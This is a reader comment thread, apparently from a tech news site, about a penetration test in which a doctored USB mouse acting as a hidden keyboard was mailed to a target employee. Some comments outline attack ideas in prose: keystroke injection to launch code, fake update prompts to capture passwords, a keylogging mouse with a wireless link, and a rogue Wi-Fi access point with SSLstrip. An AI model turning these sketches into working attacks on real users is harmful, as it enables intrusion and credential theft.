    Unsolicited gifts are also a point of suspicion, and have been to me since the 70s. Despite there being laws against it, I occasionally got "gifts" sent in that were subsequently invoiced for, or was supposed to retain only if I took out a subscription or something. While the law technically allowed me to keep whatever was sent, the trouble the senders usually caused over it made it not worth keeping. So from that, I have a healthy skepticism concerning unsolicited deliveries. Seems like there's another reason to keep that going now.

    1. The Infamous Grouse
      Alert

      Self control

      I admire your self-control. While I'm fairly paranoid about security I'm afraid to say it's almost certain that my curiosity would get the better of me (regarding the thumb drive, not the stepped-on pie).

      Having said that, it would be tried in a non-networked sacrificial laptop that would be nuked and re-imaged immediately afterwards. There's quite a wide margin between curiosity and idiocy.

  33. json
    Pint

    Bravo!

    .. only shows human beings are the weakest link.

  34. Anonymous Coward
    WTF?

    Why would an OS allow a mouse to 'type'

    This seems like a flaw in the OS. The built-in driver code that handles HID devices like keyboards and mice is able to distinguish between the two, so it ought to default to not letting a mouse send characters. If you really have some weird need for that, fine, you can tweak the registry or whatever.

    Hopefully the Linux kernel guys have already seen this and checked in such a fix, and presumably after going through five layers of middle management, Microsoft will do so also.

    I hope, as well, that any other USB device that isn't a keyboard or mouse, like a USB key, phone, hard drive, printer, modem, etc. would also not be allowed to act as a HID device and send either keyboard characters or mouse movements/button presses (which in a GUI, along with cut and paste, could probably be used to 'type' commands as well, albeit with a bit higher level of difficulty)

    It goes without saying that devices you don't expect to mount a filesystem, like a keyboard, mouse or printer, should not be able to do so.

    Clearly the guys programming USB code have never thought for a moment about basic security!

    1. The Infamous Grouse

      Typing mouse

      Because it identifies itself as both. Imagine you plugged in a mini hub into which was already plugged both a mouse and keyboard. What would the OS see? That's what this device effectively is.

    2. Wize

      RTFA

      It isn't just a mouse. Think of it as plugging in a usb hub with a mouse and a keyboard attached.

      1. Richard 12 Silver badge
        Boffin

        Actually, it's one device with multiple roles.

        The generic HID device allows you to define multiple endpoints in the *same* device, thus one HID-compliant device can be both the mouse and the keyboard.

        The HID device I'm typing on right now is also my mouse - according to Windows 7, it's one device that sits in both the Keyboard and Mouse categories.

        There's a lot of them around - it just tells the OS that it's both. Windows normally enumerates it saying "HID-compliant device" if it says anything and doesn't actually say whether it thinks it's a keyboard or mouse.

  35. revdjenk
    Paris Hilton

    usb live ...

    ...couldn't you have this begin a usb live linux, on the next start. All user interfaces are locked out, while the screen reads: "Update in progress" with a X minute countdown timer; and it would have relatively free reign within the machine.

    Paris, because she would leave for a break...

  36. Anonymous Coward
    Anonymous Coward

    Old Grey Hat?

    I have seen* security software that would require you to find *exactly* the same make and model of mouse as the user's existing one to modify before it would allow this attack to work. Plugging any USB device into the machine that wasn't already 'approved' would cause the machine to lock out with a scary full screen splash and necessitate a call to IT security to unlock/approve the device.

    Even USB KVM switches of the same model but a later revision trip it out so *any* change to the USB VID/PID would render the machine unusable. I don't know if the software would have been smart enough to qualify the data from the device but it wouldn't surprise me if it did.

    *I can't remember the name of it, it was at least two years ago in a Government department I can but won't name.

  37. Ted Treen
    Unhappy

    Clever...

    but bang goes the opportunity to sell "BNIB" meeces on ebay...

  38. AlexV
    FAIL

    Clever, but specifically *not* what they were hired for

    I'd ask for my money back, if I were the customer. Netragard were specifically told what they wanted tested, and it wasn't social engineering or physical access attacks - they wanted to know how well their network would stand up against external attack. Netragard completely failed to do this.

    Or maybe we don't have the full story, maybe they did test it, found no vulnerabilities, and decided to go off-mission and get some publicity for a clever stunt anyway. Either way, they'd not be getting my business again.

    1. dave 46

      exactly

      This is social engineering - getting a schmuck to plug a hacked mouse in isn't too different to getting them to download and run your malware.

      I'd be pointing at the 'social engineering' clause and telling them to go do what I paid them to.

  39. Anonymous Coward
    Anonymous Coward

    Yes, it's "jerry rigged"

    No it's not "jury rigged", as a couple of readers have claimed.

    http://www.merriam-webster.com/dictionary/jerry-rigged

    Mind you, new phrase on me... and I lived in America for a couple of years.

    1. Michael H.F. Wilkinson Silver badge
      Headmaster

      Actually

      Jury-rigged comes from for "injury-rigged", a phrase used for any lash-up of remnants of masts spars and sails allowing a ship to creep forward after damage. Jerry rigged seems derived from the same. However, this mouse is hardly a crudely made (though it is improvised), it is pretty cunning.

    2. Anonymous Coward
      Headmaster

      No, actually...

      It's either jury-rigged or jerry-built.

      I'd ignore Merriam-Webster. It's full of incorrect spellings, such as "color".

  40. James Cullingham

    Touché!

    http://www.merriam-webster.com/dictionary/jury-rig

  41. Fred 5

    Customer requirements?

    Does nobody else think this reads more like a press release? A "customer" just happened to have some very unusual requirements for how we could hack their system. It just so happened we devised a neat solution that would get our name in the press.

    Anyway, wouldn't a trojan mouse count as " gaining unauthorized physical access to computers"?

  42. Mahou Saru

    I guess it depends how you read it, but...

    I think that they were within the limits set by the customer:

    "The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits."

    Social engineering in the context of that sentence to me implies interacting with a member of the company. The list they brought could have been from any source, but more importantly they didn't acquire it via social engineering.

    Physical access? That would be someone sneaking in and getting the paws physically on the box, especially in context of the sentence.

  43. Anonymous Coward
    Anonymous Coward

    A keyboard could be nastier

    Combine this with a keylogger and hope the user has access to sudo...

  44. Anonymous Coward
    Anonymous Coward

    "...client specifically ruled out the use of..."

    Because real hackers only attack the things you're protected against.

  45. Michael H.F. Wilkinson Silver badge
    Happy

    Mini-computer inside a mouse?

    Calling the microcontroller a "mini-computer is a bit curious, as the last mini-computer I worked on (PDP11-70) was rather too big to fit inside the mouse (or even a rat)

    1. Anonymous Coward
      Anonymous Coward

      Re: Michael H.F. Wilkinson

      Did you try turning it sideways and taking a really long run up?

      1. Michael H.F. Wilkinson Silver badge
        Happy

        It was more of a case of

        it didn't fit, so we forced it,

        it couldn't be force so we used a bigger hammer

        it broke, so it needed replacement anyway

        1. Anonymous Coward
          Anonymous Coward

          @Michael H.F. Wilkinson

          Good to know there is still someone following proper profession procedures.

        2. Fred Flintstone Gold badge

          Actually, the full sequence is:

          1 - Measure with a micrometer

          2 - Mark with chalk

          3 - Cut with an axe

          4 - It it doesn't fit, use a larger hammer

          5 - If it breaks it needed replacing anyway

  46. NomNomNom

    Color me skeptical

    What makes me suspicious is the impossibility of guaranteeing the user is away from the computer when the malware takes over control. Surely 60 seconds after a machine turns on the user is using the keyboard and mouse to log in?

    So it looks like this exploit presumes the user will go for a coffee after starting the machine up. Fair enough, but what stops them coming back to the room find the mouse moving across the desk of it's own volition and the keys on their keyboard moving up and down as if the invisible man were sitting there? Anyone in that situation is probably going to realize something is wrong.

    At the very least you would reach for the mouse and try to hold it down so it can't move anymore. I don't know how powerful their mouse mover is but I imagine an average man would be able to hold the mouse in place with one hand while calling IT/security with the other.

    So this exploit claim just seems a bit fishy to me.

    What would be actually clever would be to put malware into the coffee machine too so that it delays the person getting back to the machine (the coffee machine could be made to say "cleaning process - please wait 4 minutes")

    1. nyelvmark
      Facepalm

      lol

      >>...the keys on their keyboard moving up and down as if the invisible man were sitting there?

      I don't think you're taking this seriously, nom.

  47. Jo 5
    Meh

    that figures

    "Department of Homeland Security released results from a recent test that showed 60 percent of employees who picked up foreign computer discs and USB thumb drives in the parking lots of government buildings and private contractors" are epicly stupid. Even the Greeks aren't this dumb.

  48. Anonymous Coward
    Trollface

    OSX

    Articles like this make me so happy that I'm running OSX.

    All I can say is "HA HA" to all you Micro$oft fanbois!

    1. Ken Hagan Gold badge
      Thumb Down

      Re: OSX

      I know you're just trolling, but that's a particularly poor attempt. In this particular case, the attackers went to considerable lengths to target a particular end-user within a particular organisation. If they'd been targetting you, you could be very sure that they would have sent you a mouse with an OSX-specific payload.

      1. Anonymous Coward
        Trollface

        OSX

        You clearly don't understand how OSX works. I've been in the computer industry for over 30 years and it's a much more secure OS. This wouldn't work on OSX.

        1. Anonymous Coward
          Anonymous Coward

          re: OSX

          Maybe it would be foiled by the "please type in your password" challenge when trying to install something, but all you need do is build a similar device based on a USB keyboard and then you can capture it.

          Its not like anyone with any sense would want to use that way too flat slab of aluminium which passes as a keyboard to Mac owners out of choice is it!

    2. Fred Flintstone Gold badge

      Actually..

      .. you could kick off terminal from a USB keyboard (cmd+space "terminal" Enter) and type in enough data to load whatever is on the stick - just give it a usable drive name. From there you can launch the classic popup "The adobe reader needs updating" which the user is used to anyway (good argument to avoid it like the plague).

      In other words, there is enough grip on the system to lure the average end user into entering their password, at which point all bets are off.

      That is, if I considered this attack likely. I may be wrong, but I can't see that being used much. The risk of discovery is too great (IMHO, of course).

  49. Richard Porter
    Headmaster

    Jerry-rigged?

    Do you mean jury-rigged?

  50. Anonymous Coward
    Joke

    I suggest calling these devices Siberian Hamsters.

    Because they're clearly not the same creature the supplier claims they are.

  51. Colin Critch
    Happy

    Be more worried about a flash USB stick with HID built in

    Be more worried about a flash USB stick with HID built in. Send the stick to several people in a company, some sucker sees a free stick plugs it in, the HID part sends the key macros for the exploit ( possibly using hidden files on the flash. I would not be surprised if they are not already out there 

  52. IT Dog

    re: "Colour me skeptical"

    Whenever you call IT support, can you hear sniggering in the background?

    Really!!

  53. Shocked Jock
    Thumb Down

    Please protect us

    from these abominations like "snuck". Ugh! I feel sick.

  54. Nyx
    Alert

    But...

    Does this mean I can no longer plug in my USB Fan, USB desk lamp or ...god forbid...MY USB TOASTER!!! Oh the humanity.....

  55. Anonymous Coward
    WTF?

    Or worse

    a USB Pet Rock?

    http://www.firebox.com/product/3296/USB-Pet-Rock

    1. Anonymous Coward
      Anonymous Coward

      I have one.

      The usual question is what would happen if you were arrested with it. "We demand you give us full access to this device!" "I can't. It's a rock."

  56. Alan Brown Silver badge

    60% ?

    Last time I heard of that test being run (early 2000s), the figure was closer to 90% - so some of the training is sticking.

  57. This post has been deleted by its author

    1. M Gale
      Coat

      Hacking a tablet

      Depends what you intend to get out of the hack. I imagine you could get a lot of passwords for a lot of services from a lot of devices by hiding in a coffee shop, hostile AP in backpack and a copy of SSLstrip running.

      Mine's the one with the custom-ROMmed smartphone pretending to be "freewifi".

  58. Tannah
    Joke

    letters and/or digits

    It's a mouse trap!

  59. joshimitsu
    Devil

    Still relies on tricking the user...

    ... into plugging in a new mouse that had been received without asking for one ...

    ... although it is a very sly trick and likely to fool many.

  60. Bunster
    Thumb Up

    Mouse!

    Brilliant! I hate to say it but wow what a move.

  61. Anonymous Coward
    Holmes

    Might have been something generic like "PC Link"?

    It was Lap Link!

    http://en.wikipedia.org/wiki/LapLink_cable

  62. Fred Flintstone Gold badge

    Impact vs probability

    Calm down a bit. If it is a *targeted* attack this is a good idea, but there is FAR too much work involved to make this a volume attack. There are quite a few risks associated with this approach too for the perpetrator.

    Will people plug in such a mouse? Yes, with a probability about equal to the percentage of people poking their nose whilst driving. However, in a large organisation the chances of hitting someone with valuable data are roughly equal to the chance that the car airbag will go off during the above nose poking causing an instant second knuckle depth digit ingress of the nasal cavity.

    So it's a risk, but it's not going to keep me awake much.

  63. Anonymous Coward
    Alert

    PS/2 port?

    Wait, was it using a USB or PS/2 port? 'Cause, y'know, newer machines accept both keyboards and mice on the same port, be that either USB (of course) or PS/2. Yes, I'll RTFA. (back to article clicked).

    And old machine I owned had 2 PS/2 ports, but the system would be angry at you if you misplaced the connectors for mice and keyb's. With the "keyboard not found" message n'all. Not to mention it being color-coded was useless under a dark, closed desk.

    But hey:

    1- intimate knowledge of the hardware, including but not limited to "undocumented" features. Hardware obfuscation defeated to your advantage. Hardware backdoors... I can't forget the Wargames movie where he gets a dial tone by grounding the speakers with a piece of tin. or sorts.

    2-obfuscated operation of interfaces that can't be blocked. You can't remove a keyboard from a PC, can you? Hardwired keyboards, so you don't need standard interfaces... I think I saw one of those... not.

    3-no physical access. really. They handed a dubious device to an unsuspecting user. The device could be remotely controlled or carried its own attack payload, no matter. They didn't get close to the machines.

    4-hiding in plain sight. it is a mouse, not a flashy pendrive of a horny, humping dog (that pendrive deserves a WTF by itself...)

    Except for the social engineering, everything else was impressive.

  64. Anonymous Coward
    FAIL

    Aand the next "must have" device is...

    Yep, you've guessed it. Tabletop backscatter machines for scanning ALL incoming devices before anyone is even allowed to take them out of the package.

    If it looks remotely like there is anything other than the correct size, shape etc PCB in that "new" keyboard, mouse or monitor... Yep, you can even exploit over DVI-D or HDMI by sending commands over the I2C bus, right to Special Ops it goes who then take it apart with tweezers under a microscope to find out who sent it and why.

    Yes this might cost slightly more but what price security?

    Bonus, you can sell "Secure PC Accessory (tm)" for a higher price, complete with welded case and tamperproof holographic stickers, where you phone up a one use number to get that particular unit's precise milligram accuracy weight to guard against foreign device installation.

    Good luck finding a way around THAT.

    -AC, but if anyone asks I always take my optical meeces apart now "just in case"...

  65. Nigel R
    Alert

    please fill in this simple questionnaire to receive your mouse...

    so you stand around the trade fair with your fake Logitek uniform on, homing in on good prospects

    Some simple questions

    1. Which level of position do you hold in your organization?

    2. Which OS do you use?

    3. Which AV

    4. ....

    On the iPhone note, the first thing you MUST do before a new iPhone will switch on the first time (to get past the iPhones's lock screen that displays the iTunes logo) is... plug in the chunky Apple usb lead and connect to iTunes! A good quality dummy iPhone will do as once connected, it can appear to have a 'fault'.

  66. Giles Jones Gold badge

    Eh?

    Erm. Surely you can do anything if you have physical access to a computer on the network?

    What was the purpose of the test? if you work at the company and do something illegal you'll get fired. Most organisations rely on goodwill and people being professionals.

    If you wanted to cause mayhem you could more than likely just light a fire or turn the electric off.

  67. vincent himpe

    another idea

    pop open a mouse and install a small usb hub device.

    install second tiny mirocontroller (pic18f2550 for example) that runs HID code and enumerates as a keyboard ...

    When you plug in this modified mouse the operating system sees both a mouse and a keyboard.

    It should now be possible to record all keystrokes....

    equip the mouse with a zigbee or bluetooth transceiver and you have instant remote capturing...

    give it a wifi link and some smart code that seeks out open wifi ports and all hell breaks loose !

  68. rcdicky
    Mushroom

    This really made me chuckle

    Hiding the microcontroller in the mouse is good enough, but posting it to an employee too is even sneakier!

    A comment was made above re "megging" cables to fry them... - After reading what's in the new Thunderbolt cables, will this even be possible should this tech take off?

  69. Imsimil Berati-Lahn

    Much harder exploit via PS2

    Of course nobody uses PS2 any more, but the exploit would also need to invoke an assembler, enter the code, assemble it and >then< run the executable instead of just [windows+R, malware_executable_name, Enter]

  70. Anonymous Coward
    Big Brother

    Brilliant

    that's so simple (not the execution, but the concept) it's brilliant, I have a small tear in my eye it's so devious.

    AC because Boys don't cry.

This topic is closed for new posts.

Other stories you might like